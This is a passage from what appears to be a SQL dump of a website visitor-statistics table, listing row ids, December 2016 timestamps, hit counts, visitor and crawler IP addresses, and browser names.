,1,1,0,0,'66.249.76.30','chrome'),(79208,1482162996,1,1,0,0,'66.102.9.29','other'),(79209,1482163756,1,0,1,0,'66.249.76.29',''),(79210,1482165396,1,1,0,0,'180.76.15.33','other'),(79211,1482167098,1,1,0,0,'92.112.249.158','firefox'),(79212,1482167247,2,2,0,0,'66.249.76.109','chrome'),(79213,1482167267,1,0,1,0,'66.249.76.28',''),(79214,1482167326,1,1,0,0,'66.249.76.108','chrome'),(79215,1482167466,1,0,1,0,'66.249.76.30',''),(79216,1482167506,1,1,0,0,'195.154.181.15','chrome'),(79217,1482167564,1,1,0,0,'66.249.66.177','chrome'),(79218,1482167858,1,1,0,0,'91.196.178.163','firefox'),(79219,1482169580,1,1,0,0,'91.196.178.71','chrome'),(79220,1482171625,1,1,0,0,'163.172.64.237','other'),(79221,1482172646,1,1,0,0,'157.55.39.37','other'),(79222,1482173227,1,1,0,0,'141.0.12.231','other'),(79223,1482173723,1,1,0,0,'91.196.178.39','firefox'),(79224,1482174261,1,1,0,0,'94.179.222.55','firefox'),(79225,1482174277,1,1,0,0,'2.50.11.129','firefox'),(79226,1482174279,1,1,0,0,'130.193.50.34','other'),(79227,1482175717,1,1,0,0,'46.211.136.248','chrome'),(79228,1482176307,1,1,0,0,'91.196.178.39','chrome'),(79229,1482176623,1,1,0,0,'46.211.136.248','chrome'),(79230,1482177519,1,1,0,0,'66.102.9.27','other'),(79231,1482178116,1,0,1,0,'66.249.76.29',''),(79232,1482178569,1,1,0,0,'163.172.64.254','other'),(79233,1482179508,1,1,0,0,'163.172.64.225','other'),(79234,1482180544,1,1,0,0,'92.112.249.158','firefox'),(79235,1482181357,1,1,0,0,'94.45.144.96','chrome'),(79236,1482181382,1,1,0,0,'95.132.132.163','chrome'),(79237,1482182104,1,1,0,0,'46.211.136.248','chrome'),(79238,1482182746,1,1,0,0,'66.249.76.108','chrome'),(79239,1482182841,1,1,0,0,'163.172.64.185','other'),(79240,1482183272,1,1,0,0,'180.76.15.25','other'),(79241,1482184608,1,0,1,0,'68.180.228.171',''),(79242,1482185646,1,0,1,0,'66.249.76.30',''),(79243,1482186284,1,1,0,0,'93.74.91.46','chrome'),(79244,1482186738,1,0,1,0,'66.249.76.28',''),(79245,1482187173,1,0,1,0,'66.249.76.30',''),(79246,1482187740,1,0,1,0,'66.249.76.29',''),(79247,1482188546,1,0,1,0,'66.249.76.108',''),(79248,1482189339,1,1,0,0,'207.46.13.148','other'),(79249,1482189568,1,1,0,0,'163.172.64.183','other'),(79250,1482189895,1,1,0,0,'163.172.64.223','other'),(79251,1482189901,1,0,1,0,'66.249.76.28',''),(79252,1482191396,1,0,1,0,'66.249.66.81',''),(79253,1482192076,1,1,0,0,'1.9.96.192','firefox'),(79254,1482192097,1,1,0,0,'66.102.9.29','other'),(79255,1482192194,1,1,0,0,'163.172.64.249','other'),(79256,1482192489,1,0,1,0,'66.249.76.28',''),(79257,1482192491,1,0,1,0,'66.249.76.109',''),(79258,1482193549,1,1,0,0,'180.76.15.19','other'),(79259,1482194107,1,0,1,0,'66.249.76.28',''),(79260,1482195355,3,0,3,0,'66.249.76.29',''),(79261,1482196335,2,0,2,0,'66.249.76.29',''),(79262,1482196501,1,1,0,0,'46.211.5.72','chrome'),(79263,1482197099,1,0,1,0,'66.249.76.28',''),(79264,1482198029,1,1,0,0,'188.32.101.49','msie'),(79265,1482198182,1,1,0,0,'207.46.13.90','other'),(79266,1482198771,1,0,1,0,'66.249.76.30',''),(79267,1482198797,1,0,1,0,'66.249.76.29',''),(79268,1482198940,2,0,2,0,'66.249.66.81',''),(79269,1482200427,1,0,1,0,'66.249.76.29',''),(79270,1482200627,1,1,0,0,'162.210.196.100','other'),(79271,1482200770,1,0,1,0,'66.249.66.99',''),(79272,1482201504,1,1,0,0,'163.172.64.236','other'),(79273,1482202077,1,1,0,0,'93.80.145.208','msie'),(79274,1482202187,2,0,2,0,'66.249.76.30',''),(79275,1482202506,2,0,2,0,'66.249.76.29',''),(79276,1482202538,1,1,0,0,'109.173.100.12','msie'),(79277,1482204127,1,0,1,0,'66.249.66.84',''),(79278,1482204342,1,0,1,0,'66.249.76.107',''),(79279,1482204494,1,1,0,0,'163.172.64.180','other'),(79280,1482204657,1,1,0,0,'157.55.39.199','other'),(79281,1482205046,1,0,1,0,'66.249.76.28',''),(79282,1482207070,1,0,1,0,'66.249.76.30',''),(79283,1482207569,1,0,1,0,'66.249.76.28',''),(79284,1482207771,1,1,0,0,'195.154.181.15','chrome'),(79285,1482208035,1,1,0,0,'163.172.64.226','other'),(79286,1482209385,1,0,1,0,'66.249.76.30',''),(79287,1482210704,2,0,2,0,'66.249.76.28',''),(79288,1482212636,1,1,0,0,'91.196.178.66','firefox'),(79289,1482213358,1,0,1,0,'66.249.76.30',''),(79290,1482213372,1,0,1,0,'66.249.66.87',''),(79291,1482213927,1,1,0,0,'163.172.64.234','other'),(79292,1482214218,1,1,0,0,'46.4.120.3','other'),(79293,1482214684,1,0,1,0,'66.249.66.81',''),(79294,1482214985,1,1,0,0,'92.112.50.254','chrome'),(79295,1482215005,1,1,0,0,'130.193.50.34','other'),(79296,1482215654,1,1,0,0,'91.196.178.71','chrome'),(79297,1482215679,1,1,0,0,'66.102.9.25','chrome'),(79298,1482216091,1,1,0,0,'178.255.215.94','other'),(79299,1482217122,1,0,1,0,'66.249.76.28',''),(79300,1482218219,1,1,0,0,'95.158.53.12','opera'),(79301,1482219375,1,1,0,0,'46.201.26.30','chrome'),(79302,1482219529,1,1,0,0,'91.196.178.69','firefox'),(79303,1482219589,1,0,1,0,'66.249.76.108',''),(79304,1482220766,1,0,1,0,'66.249.66.84',''),(79305,1482220949,1,1,0,0,'163.172.64.225','other'),(79306,1482221027,1,1,0,0,'66.102.9.27','other'),(79307,1482221231,1,1,0,0,'93.74.212.147','firefox'),(79308,1482221415,2,2,0,0,'91.250.59.156','chrome'),(79309,1482222138,1,1,0,0,'91.196.178.69','firefox'),(79310,1482222295,1,1,0,0,'82.207.102.185','firefox'),(79311,1482222379,1,1,0,0,'163.172.64.185','other'),(79312,1482223270,1,1,0,0,'91.196.177.15','chrome'),(79313,1482224854,1,1,0,0,'91.196.177.15','chrome'),(79314,1482224891,1,1,0,0,'195.49.151.99','chrome'),(79315,1482224903,1,1,0,0,'130.193.50.34','other'),(79316,1482225122,1,0,1,0,'66.249.76.28',''),(79317,1482225175,1,1,0,0,'46.164.128.90','firefox'),(79318,1482225190,1,1,0,0,'130.193.51.19','other'),(79319,1482225961,1,1,0,0,'91.196.178.66','firefox'),(79320,1482226028,1,1,0,0,'109.251.210.100','chrome'),(79321,1482226337,1,1,0,0,'188.73.160.17','firefox'),(79322,1482226507,1,1,0,0,'91.196.178.33','firefox'),(79323,1482226600,1,0,1,0,'66.249.66.81',''),(79324,1482227375,1,1,0,0,'91.196.177.26','chrome'),(79325,1482227485,1,1,0,0,'91.196.178.68','firefox'),(79326,1482227893,1,1,0,0,'91.196.178.69','firefox'),(79327,1482227916,1,1,0,0,'93.72.49.133','other'),(79328,1482228641,1,0,1,0,'66.249.76.30',''),(79329,1482228862,1,1,0,0,'91.196.178.72','chrome'),(79330,1482228928,1,0,1,0,'66.249.66.87',''),(79331,1482229020,1,0,1,0,'66.249.76.29',''),(79332,1482229061,1,0,1,0,'66.249.76.28',''),(79333,1482229594,1,1,0,0,'37.54.89.171','chrome'),(79334,1482229983,1,0,1,0,'66.249.76.30',''),(79335,1482230876,1,1,0,0,'91.196.178.68','firefox'),(79336,1482232135,1,1,0,0,'37.54.171.156','chrome'),(79337,1482232174,1,1,0,0,'91.196.178.71','other'),(79338,1482232545,1,1,0,0,'163.172.64.246','other'),(79339,1482232658,1,0,1,0,'66.249.76.30',''),(79340,1482233058,1,1,0,0,'163.172.64.193','other'),(79341,1482233701,1,1,0,0,'91.196.177.26','chrome'),(79342,1482233848,1,1,0,0,'66.249.76.107','chrome'),(79343,1482234565,3,3,0,0,'83.149.126.98','other'),(79344,1482235262,1,1,0,0,'66.102.9.27','other'),(79345,1482235502,1,0,1,0,'66.249.76.30',''),(79346,1482236100,1,1,0,0,'91.196.178.65','firefox'),(79347,1482236326,1,0,1,0,'66.249.76.109',''),(79348,1482236343,1,0,1,0,'66.249.66.87',''),(79349,1482236701,1,1,0,0,'94.179.35.105','firefox'),(79350,1482236724,1,0,1,0,'66.249.66.81',''),(79351,1482236740,1,0,1,0,'66.249.76.29',''),(79352,1482237708,1,1,0,0,'94.179.35.105','firefox'),(79353,1482239328,1,1,0,0,'91.196.178.165','chrome'),(79354,1482239739,1,1,0,0,'91.235.102.235','chrome'),(79355,1482239777,1,1,0,0,'130.193.51.19','other'),(79356,1482240236,1,1,0,0,'91.196.178.165','chrome'),(79357,1482240375,1,1,0,0,'37.53.128.223','chrome'),(79358,1482240591,1,1,0,0,'37.52.45.133','chrome'),(79359,1482240649,1,1,0,0,'163.172.64.185','other'),(79360,1482241070,1,1,0,0,'178.94.51.7','chrome'),(79361,1482241744,1,1,0,0,'198.204.240.42','chrome'),(79362,1482242026,1,1,0,0,'130.180.220.154','firefox'),(79363,1482242472,1,1,0,0,'94.178.147.103','firefox'),(79364,1482242498,1,1,0,0,'130.193.50.34','other'),(79365,1482242691,1,1,0,0,'91.196.178.65','firefox'),(79366,1482242730,1,1,0,0,'163.172.64.183','other'),(79367,1482243174,1,1,0,0,'193.239.254.52','chrome'),(79368,1482244022,1,1,0,0,'91.196.178.71','msie'),(79369,1482245936,1,1,0,0,'31.41.70.15','opera'),(79370,1482245993,1,1,0,0,'46.211.120.160','other'),(79371,1482246339,3,3,0,0,'51.254.143.240','other'),(79372,1482247063,1,1,0,0,'91.196.178.71','chrome'),(79373,1482247524,1,1,0,0,'91.196.178.71','other'),(79374,1482247731,1,0,1,0,'66.249.76.28',''),(79375,1482247798,1,1,0,0,'95.132.133.182','chrome'),(79376,1482247829,1,1,0,0,'163.172.64.225','other'),(79377,1482247993,1,0,1,0,'66.249.66.87',''),(79378,1482248767,1,0,1,0,'66.249.76.30',''),(79379,1482249806,1,1,0,0,'66.102.9.25','other'),(79380,1482249823,4,4,0,0,'66.249.76.29','chrome'),(79381,1482250302,1,1,0,0,'163.172.64.242','other'),(79382,1482250862,1,1,0,0,'141.8.142.67','other'),(79383,1482251686,1,1,0,0,'91.196.178.68','chrome'),(79384,1482251727,1,1,0,0,'130.180.216.14','chrome'),(79385,1482252165,1,1,0,0,'163.172.64.193','other'),(79386,1482252330,1,1,0,0,'5.45.255.73','chrome'),(79387,1482253337,1,1,0,0,'207.46.13.22','other'),(79388,1482254026,1,1,0,0,'207.46.13.4','other'),(79389,1482254965,1,1,0,0,'46.201.215.23','chrome'),(79390,1482255844,1,1,0,0,'91.196.178.72','chrome'),(79391,1482255867,1,1,0,0,'130.193.51.19','other'),(79392,1482256563,1,1,0,0,'195.154.181.15','chrome'),(79393,1482256615,1,1,0,0,'141.8.142.61','other'),(79394,1482258118,1,0,1,0,'66.249.76.109',''),(79395,1482258294,2,2,0,0,'91.196.178.164','chrome'),(79396,1482258700,1,1,0,0,'163.172.64.251','other'),(79397,1482260840,1,0,1,0,'66.249.66.180',''),(79398,1482261173,1,1,0,0,'207.46.13.148','other'),(79399,1482264221,1,1,0,0,'66.102.9.25','other'),(79400,1482264993,1,1,0,0,'163.172.64.242','other'),(79401,1482265004,1,0,1,0,'66.249.76.28',''),(79402,1482266279,1,1,0,0,'37.52.23.190','chrome'),(79403,1482267590,1,1,0,0,'46.211.249.223','chrome'),(79404,1482267628,1,0,1,0,'66.249.76.30',''),(79405,1482269320,1,1,0,0,'163.172.64.177','other'),(79406,1482269741,1,1,0,0,'180.76.15.154','other'),(79407,1482269742,1,0,1,0,'66.249.66.183',''),(79408,1482271824,1,1,0,0,'163.172.64.234','other'),(79409,1482272214,1,0,1,0,'66.249.76.29',''),(79410,1482272703,1,1,0,0,'209.58.178.49','other'),(79411,1482273291,1,1,0,0,'207.46.13.4','other'),(79412,1482274715,1,1,0,0,'66.249.76.29','chrome'),(79413,1482275652,5,5,0,0,'194.187.248.10','other'),(79414,1482276185,1,0,1,0,'66.249.76.28',''),(79415,1482276191,1,0,1,0,'66.249.66.81',''),(79416,1482276224,1,1,0,0,'163.172.64.220','other'),(79417,1482276478,1,1,0,0,'163.172.64.250','other'),(79418,1482277537,1,1,0,0,'46.118.70.80','chrome'),(79419,1482278730,1,1,0,0,'66.102.9.29','other'),(79420,1482278742,1,1,0,0,'163.172.64.242','other'),(79421,1482279213,1,1,0,0,'207.46.13.4','other'),(79422,1482280219,1,1,0,0,'163.172.64.180','other'),(79423,1482280374,1,1,0,0,'207.46.13.4','other'),(79424,1482281388,1,1,0,0,'180.76.15.140','other'),(79425,1482281621,1,0,1,0,'66.249.76.29',''),(79426,1482282552,1,1,0,0,'163.172.64.234','other'),(79427,1482282981,1,0,1,0,'66.249.76.108',''),(79428,1482286287,1,1,0,0,'163.172.64.253','other'),(79429,1482288483,1,1,0,0,'66.249.76.107','chrome'),(79430,1482288487,1,1,0,0,'66.249.76.29','chrome'),(79431,1482288532,1,1,0,0,'163.172.64.182','other'),(79432,1482288786,1,1,0,0,'95.135.117.110','other'),(79433,1482290237,1,1,0,0,'207.46.13.22','other'),(79434,1482291511,1,1,0,0,'163.172.64.236','other'),(79435,1482291899,1,0,1,0,'66.249.66.81',''),(79436,1482292577,1,0,1,0,'66.249.66.84',''),(79437,1482292859,1,1,0,0,'66.102.9.27','other'),(79438,1482293529,1,0,1,0,'66.249.76.107',''),(79439,1482293661,1,0,1,0,'66.249.76.29',''),(79440,1482293718,1,1,0,0,'163.172.64.188','other'),(79441,1482294567,1,1,0,0,'209.58.178.49','other'),(79442,1482297309,1,0,1,0,'66.249.76.107',''),(79443,1482298831,1,1,0,0,'91.196.178.68','firefox'),(79444,1482300363,1,1,0,0,'91.196.178.68','firefox'),(79445,1482300915,1,0,1,0,'66.249.66.87',''),(79446,1482302141,1,1,0,0,'109.122.62.204','chrome'),(79447,1482302560,1,1,0,0,'207.46.13.22','other'),(79448,1482302767,2,2,0,0,'62.210.148.246','other'),(79449,1482302939,1,1,0,0,'46.200.13.169','chrome'),(79450,1482303167,1,1,0,0,'213.160.129.78','firefox'),(79451,1482304378,1,1,0,0,'163.172.64.226','other'),(79452,1482304480,1,1,0,0,'95.210.162.68','chrome'),(79453,1482304787,1,1,0,0,'180.76.15.155','other'),(79454,1482305179,1,1,0,0,'91.196.178.68','firefox'),(79455,1482305534,1,0,1,0,'66.249.76.107',''),(79456,1482305778,1,1,0,0,'91.196.177.15','chrome'),(79457,1482306522,1,1,0,0,'91.196.178.166','chrome'),(79458,1482306604,1,1,0,0,'82.207.102.185','firefox'),(79459,1482307294,1,1,0,0,'66.102.9.25','other'),(79460,1482309966,1,1,0,0,'91.196.177.26','chrome'),(79461,1482310994,1,0,1,0,'66.249.66.81',''),(79462,1482311245,1,0,1,0,'66.249.76.107',''),(79463,1482312145,2,2,0,0,'91.196.178.70','chrome'),(79464,1482312913,1,1,0,0,'91.196.178.70','firefox'),(79465,1482313499,1,1,0,0,'94.178.130.219','chrome'),(79466,1482314236,1,1,0,0,'157.55.39.161','other'),(79467,1482314311,1,1,0,0,'95.158.7.62','chrome'),(79468,1482314411,10,10,0,0,'69.58.178.59','firefox'),(79469,1482314957,1,1,0,0,'91.196.177.26','chrome'),(79470,1482315080,1,0,1,0,'66.249.66.84',''),(79471,1482315542,1,1,0,0,'91.196.178.68','firefox'),(79472,1482315634,1,0,1,0,'66.249.76.29',''),(79473,1482316639,1,1,0,0,'91.196.178.36','chrome'),(79474,1482316761,1,1,0,0,'91.196.178.68','firefox'),(79475,1482317728,1,1,0,0,'178.95.245.62','chrome'),(79476,1482317743,1,1,0,0,'141.8.183.25','other'),(79477,1482318065,1,1,0,0,'91.196.177.26','chrome'),(79478,1482318456,1,1,0,0,'185.8.43.213','chrome'),(79479,1482318621,1,1,0,0,'130.180.218.223','firefox'),(79480,1482318717,1,1,0,0,'108.59.8.80','other'),(79481,1482319364,1,1,0,0,'5.58.43.92','msie'),(79482,1482320105,1,1,0,0,'91.196.178.65','opera'),(79483,1482320220,1,1,0,0,'89.21.73.51','chrome'),(79484,1482320248,2,2,0,0,'5.9.111.70','other'),(79485,1482321553,1,1,0,0,'91.124.3.50','firefox'),(79486,1482321809,1,1,0,0,'130.180.208.230','chrome'),(79487,1482321853,1,1,0,0,'66.102.9.29','other'),(79488,1482322748,1,1,0,0,'37.115.134.83','chrome'),(79489,1482322761,1,1,0,0,'130.180.208.111','chrome'),(79490,1482322879,1,0,1,0,'66.249.76.27',''),(79491,1482322988,1,1,0,0,'91.231.148.18','chrome'),(79492,1482323002,1,1,0,0,'141.8.183.25','other'),(79493,1482323090,1,1,0,0,'91.196.178.72','firefox'),(79494,1482323125,1,1,0,0,'91.196.178.68','chrome'),(79495,1482323874,1,1,0,0,'78.154.164.204','chrome'),(79496,1482323945,1,1,0,0,'195.68.203.239','chrome'),(79497,1482324427,1,1,0,0,'91.196.177.110','chrome'),(79498,1482324508,1,0,1,0,'66.249.76.109',''),(79499,1482324532,1,0,1,0,'66.249.66.81',''),(79500,1482325414,1,1,0,0,'91.196.178.165','chrome'),(79501,1482325506,1,1,0,0,'180.76.15.159','other'),(79502,1482326268,1,1,0,0,'188.32.242.19','opera'),(79503,1482326339,1,1,0,0,'66.102.9.29','chrome'),(79504,1482326499,1,1,0,0,'31.43.23.49','chrome'),(79505,1482326517,1,1,0,0,'91.196.178.68','firefox'),(79506,1482326931,1,1,0,0,'91.196.178.65','firefox'),(79507,1482327374,1,1,0,0,'141.8.142.61','other'),(79508,1482327384,1,1,0,0,'141.8.183.19','other'),(79509,1482327543,1,1,0,0,'157.55.39.228','other'),(79510,1482328020,1,1,0,0,'91.196.178.68','firefox'),(79511,1482328460,1,1,0,0,'176.117.176.43','chrome'),(79512,1482328524,1,1,0,0,'37.53.224.111','firefox'),(79513,1482328619,1,1,0,0,'176.120.37.43','chrome'),(79514,1482328620,1,1,0,0,'91.124.60.253','chrome'),(79515,1482328667,1,1,0,0,'130.193.50.6','other'),(79516,1482329100,1,1,0,0,'77.93.41.218','chrome'),(79517,1482329328,1,1,0,0,'91.196.177.15','chrome'),(79518,1482329491,1,1,0,0,'91.124.3.50','firefox'),(79519,1482329969,1,1,0,0,'91.196.178.136','chrome'),(79520,1482330757,1,1,0,0,'66.249.76.30','chrome'),(79521,1482332150,1,1,0,0,'91.196.178.71','other'),(79522,1482332271,6,6,0,0,'95.132.63.129','chrome'),(79523,1482332315,1,1,0,0,'94.179.63.84','firefox'),(79524,1482332462,1,0,1,0,'66.249.66.81',''),(79525,1482332480,3,0,3,0,'66.249.76.27',''),(79526,1482332539,1,1,0,0,'91.237.107.150','chrome'),(79527,1482332857,1,1,0,0,'91.196.177.46','firefox'),(79528,1482333103,1,1,0,0,'91.124.3.50','firefox'),(79529,1482333631,1,1,0,0,'37.53.91.14','firefox'),(79530,1482334278,1,1,0,0,'66.249.76.27','chrome'),(79531,1482334403,1,1,0,0,'157.55.39.161','other'),(79532,1482334852,2,1,1,0,'66.249.76.30',''),(79533,1482335306,1,1,0,0,'157.55.39.228','other'),(79534,1482335630,1,1,0,0,'66.249.76.27','chrome'),(79535,1482335766,2,2,0,0,'66.249.66.87','chrome'),(79536,1482336214,1,1,0,0,'66.102.9.27','other'),(79537,1482336488,1,1,0,0,'78.152.161.152','firefox'),(79538,1482337364,1,1,0,0,'46.211.145.87','chrome'),(79539,1482337417,1,1,0,0,'91.196.178.72','firefox'),(79540,1482338540,1,1,0,0,'91.196.178.162','chrome'),(79541,1482339129,1,0,1,0,'66.249.76.27',''),(79542,1482339159,1,1,0,0,'157.55.39.161','other'),(79543,1482339379,1,0,1,0,'66.249.66.87',''),(79544,1482339844,1,1,0,0,'207.46.13.4','other'),(79545,1482339854,1,0,1,0,'66.249.76.30',''),(79546,1482339900,1,1,0,0,'66.249.76.27','chrome'),(79547,1482340307,1,1,0,0,'91.196.177.15','chrome'),(79548,1482340963,1,0,1,0,'66.249.66.87',''),(79549,1482341133,2,2,0,0,'66.249.76.27','chrome'),(79550,1482341184,1,1,0,0,'66.249.76.29','chrome'),(79551,1482341677,1,1,0,0,'95.132.133.206','firefox'),(79552,1482341782,1,1,0,0,'157.55.39.228','other'),(79553,1482341794,1,1,0,0,'141.8.183.25','other'),(79554,1482341993,1,1,0,0,'91.196.178.135','chrome'),(79555,1482342327,1,1,0,0,'66.249.76.27','chrome'),(79556,1482342615,1,1,0,0,'207.46.13.4','other'),(79557,1482344040,1,1,0,0,'130.193.50.34','other'),(79558,1482344355,1,0,1,0,'66.249.76.29',''),(79559,1482344368,2,0,2,0,'66.249.66.81',''),(79560,1482344370,1,0,1,0,'66.249.76.27',''),(79561,1482344405,1,0,1,0,'66.249.66.84',''),(79562,1482344471,3,3,0,0,'66.249.76.29','chrome'),(79563,1482345069,1,1,0,0,'130.193.51.19','other'),(79564,1482345203,1,1,0,0,'130.180.217.68','chrome'),(79565,1482346936,1,1,0,0,'94.179.94.34','chrome'),(79566,1482347087,1,1,0,0,'66.249.66.81','chrome'),(79567,1482347411,1,1,0,0,'130.180.210.213','chrome'),(79568,1482347420,1,1,0,0,'66.249.76.108','chrome'),(79569,1482347611,1,1,0,0,'130.193.50.34','other'),(79570,1482347627,1,1,0,0,'157.55.39.161','other'),(79571,1482347752,1,0,1,0,'66.249.66.84',''),(79572,1482347978,1,1,0,0,'37.53.21.169','chrome'),(79573,1482348126,1,1,0,0,'66.249.66.87','chrome'),(79574,1482348165,1,1,0,0,'66.249.66.81','chrome'),(79575,1482348878,1,1,0,0,'94.45.140.131','chrome'),(79576,1482348961,1,1,0,0,'66.249.76.107','chrome'),(79577,1482349438,1,1,0,0,'178.94.188.149','chrome'),(79578,1482350252,1,1,0,0,'157.55.39.161','other'),(79579,1482350479,1,1,0,0,'66.102.9.25','other'),(79580,1482351107,1,1,0,0,'141.0.12.202','other'),(79581,1482351600,1,1,0,0,'157.55.39.161','other'),(79582,1482351786,1,1,0,0,'207.46.13.22','other'),(79583,1482352970,1,1,0,0,'194.126.181.60','chrome'),(79584,1482353561,1,1,0,0,'195.234.6.11','chrome'),(79585,1482355898,1,0,1,0,'68.180.229.190',''),(79586,1482357231,1,1,0,0,'130.193.50.34','other'),(79587,1482357517,1,0,1,0,'66.249.76.29',''),(79588,1482357973,1,1,0,0,'66.249.76.29','chrome'),(79589,1482358152,1,1,0,0,'66.249.66.81','chrome'),(79590,1482359125,1,1,0,0,'130.193.51.19','other'),(79591,1482360112,1,1,0,0,'66.249.76.109','chrome'),(79592,1482360182,1,1,0,0,'66.249.66.183','chrome'),(79593,1482360226,1,1,0,0,'66.249.76.108','chrome'),(79594,1482360229,1,1,0,0,'66.249.76.27','chrome'),(79595,1482363297,1,0,1,0,'66.249.76.27',''),(79596,1482363906,1,1,0,0,'141.8.183.25','other'),(79597,1482364922,1,1,0,0,'66.102.9.29','other'),(79598,1482364987,1,0,1,0,'66.249.66.180',''),(79599,1482367229,7,7,0,0,'51.255.51.69','other'),(79600,1482367861,1,0,1,0,'66.249.66.84',''),(79601,1482367889,1,0,1,0,'66.249.76.29',''),(79602,1482367903,6,0,6,0,'66.249.76.27',''),(79603,1482368029,2,0,2,0,'66.249.66.81',''),(79604,1482368323,1,0,1,0,'66.249.76.26',''),(79605,1482368402,2,0,2,0,'66.249.76.28',''),(79606,1482368543,3,3,0,0,'66.249.76.27','chrome'),(79607,1482368604,2,2,0,0,'66.249.66.87','chrome'),(79608,1482368911,1,0,1,0,'66.249.66.177',''),(79609,1482369627,1,1,0,0,'66.249.66.84','chrome'),(79610,1482369629,1,1,0,0,'66.249.76.108','chrome'),(79611,1482370094,1,1,0,0,'52.86.176.3','other'),(79612,1482370544,2,0,2,0,'66.249.76.27',''),(79613,1482370547,1,0,1,0,'66.249.76.29',''),(79614,1482370725,1,1,0,0,'157.55.39.228','other'),(79615,1482371361,1,0,1,0,'66.249.66.81',''),(79616,1482371998,1,1,0,0,'66.249.76.29','chrome'),(79617,1482373103,1,1,0,0,'207.46.13.4','other'),(79618,1482373249,2,2,0,0,'66.249.76.28','chrome'),(79619,1482373355,2,2,0,0,'66.249.76.27','chrome'),(79620,1482373902,2,2,0,0,'66.249.66.81','chrome'),(79621,1482375600,1,0,1,0,'66.249.76.27',''),(79622,1482376743,1,1,0,0,'180.76.15.161','other'),(79623,1482377311,1,1,0,0,'195.154.181.15','chrome'),(79624,1482377713,1,0,1,0,'66.249.66.180',''),(79625,1482378135,1,0,1,0,'66.249.76.28',''),(79626,1482379399,1,1,0,0,'66.102.9.25','other'),(79627,1482379830,1,0,1,0,'66.249.76.109',''),(79628,1482381100,1,1,0,0,'157.55.39.228','other'),(79629,1482382185,1,1,0,0,'66.249.66.87','chrome'),(79630,1482383120,1,1,0,0,'180.76.15.19','other'),(79631,1482384174,1,1,0,0,'207.46.13.22','other'),(79632,1482385357,1,1,0,0,'91.196.178.68','firefox'),(79633,1482387407,1,0,1,0,'66.249.76.27',''),(79634,1482387977,1,1,0,0,'207.46.13.22','other'),(79635,1482388155,1,1,0,0,'91.196.178.72','firefox'),(79636,1482388347,1,1,0,0,'91.196.178.67','chrome'),(79637,1482388578,1,1,0,0,'91.196.178.72','chrome'),(79638,1482388605,1,0,1,0,'66.249.76.27',''),(79639,1482389014,1,1,0,0,'157.55.39.161','other'),(79640,1482389212,1,1,0,0,'130.193.51.19','other'),(79641,1482391219,1,1,0,0,'77.52.179.135','chrome'),(79642,1482391272,1,1,0,0,'77.93.41.218','chrome'),(79643,1482391484,1,1,0,0,'95.132.143.96','chrome'),(79644,1482391896,1,1,0,0,'91.196.178.130','firefox'),(79645,1482392388,1,1,0,0,'37.53.229.122','firefox'),(79646,1482392466,1,1,0,0,'52.86.176.3','other'),(79647,1482393183,1,1,0,0,'217.12.196.154','chrome'),(79648,1482393672,1,1,0,0,'66.102.9.29','other'),(79649,1482394083,1,1,0,0,'91.196.178.67','msie'),(79650,1482394479,1,1,0,0,'91.196.177.15','chrome'),(79651,1482394777,1,1,0,0,'178.93.16.39','chrome'),(79652,1482395439,1,1,0,0,'54.172.68.113','other'),(79653,1482396112,1,0,1,0,'66.249.76.29',''),(79654,1482396913,1,0,1,0,'68.180.228.38',''),(79655,1482396952,62,62,0,0,'82.193.102.149','other'),(79656,1482397388,1,1,0,0,'195.12.59.20','chrome'),(79657,1482397402,1,1,0,0,'91.196.178.69','chrome'),(79658,1482397422,1,1,0,0,'91.196.177.15','chrome'),(79659,1482397545,1,1,0,0,'178.94.45.50','chrome'),(79660,1482398022,1,1,0,0,'195.154.181.15','chrome'),(79661,1482398287,1,1,0,0,'195.154.181.162','chrome'),(79662,1482400338,1,1,0,0,'91.196.178.67','firefox'),(79663,1482400474,1,1,0,0,'37.54.41.47','chrome'),(79664,1482400682,2,2,0,0,'91.196.178.67','chrome'),(79665,1482400816,2,2,0,0,'95.132.26.251','firefox'),(79666,1482401070,1,0,1,0,'66.249.66.183',''),(79667,1482401298,1,1,0,0,'91.196.178.70','chrome'),(79668,1482401685,1,1,0,0,'95.132.80.252','chrome'),(79669,1482402824,1,1,0,0,'91.196.177.26','chrome'),(79670,1482402877,1,0,1,0,'66.249.66.84',''),(79671,1482402943,1,1,0,0,'91.196.178.131','other'),(79672,1482404033,1,1,0,0,'194.44.213.142','firefox'),(79673,1482404070,1,1,0,0,'91.196.178.72','firefox'),(79674,1482404112,1,1,0,0,'82.207.49.86','chrome'),(79675,1482405007,1,1,0,0,'163.172.64.247','other'),(79676,1482405303,1,1,0,0,'94.179.68.15','chrome'),(79677,1482405615,1,1,0,0,'91.196.178.162','chrome'),(79678,1482405730,1,1,0,0,'178.255.215.94','other'),(79679,1482406198,1,1,0,0,'141.8.183.25','other'),(79680,1482406777,1,0,1,0,'66.249.76.29',''),(79681,1482407590,1,1,0,0,'92.113.43.96','firefox'),(79682,1482407601,1,1,0,0,'130.193.50.34','other'),(79683,1482407827,1,0,1,0,'66.249.76.29',''),(79684,1482408261,1,1,0,0,'66.102.9.27','other'),(79685,1482408547,1,0,1,0,'66.249.76.107',''),(79686,1482408947,1,1,0,0,'162.210.196.129','other'),(79687,1482409289,1,1,0,0,'163.172.64.222','other'),(79688,1482409999,1,1,0,0,'91.196.178.69','firefox'),(79689,1482410148,1,1,0,0,'46.201.70.211','firefox'),(79690,1482410283,1,1,0,0,'91.196.178.70','chrome'),(79691,1482411256,1,1,0,0,'95.133.25.94','chrome'),(79692,1482411794,1,1,0,0,'178.95.59.95','opera'),(79693,1482412119,1,1,0,0,'92.113.58.3','chrome'),(79694,1482412385,1,1,0,0,'207.46.13.22','other'),(79695,1482414050,1,1,0,0,'37.53.229.122','firefox'),(79696,1482414092,1,1,0,0,'163.172.64.241','other'),(79697,1482414144,1,1,0,0,'194.44.242.131','chrome'),(79698,1482414169,1,1,0,0,'163.172.64.242','other'),(79699,1482414299,1,1,0,0,'82.145.222.78','other'),(79700,1482414304,1,0,1,0,'66.249.76.28',''),(79701,1482414693,1,1,0,0,'91.196.178.69','chrome'),(79702,1482414891,1,1,0,0,'91.196.177.26','chrome'),(79703,1482415270,1,1,0,0,'163.172.64.199','other'),(79704,1482415467,1,0,1,0,'66.249.76.27',''),(79705,1482415557,1,1,0,0,'163.172.64.222','other'),(79706,1482415730,1,1,0,0,'130.180.210.242','chrome'),(79707,1482415790,1,1,0,0,'130.180.219.174','chrome'),(79708,1482415995,1,0,1,0,'66.249.76.107',''),(79709,1482416291,1,1,0,0,'130.180.218.69','chrome'),(79710,1482416459,1,1,0,0,'91.196.178.70','firefox'),(79711,1482416646,1,1,0,0,'130.180.210.242','chrome'),(79712,1482417623,1,1,0,0,'91.196.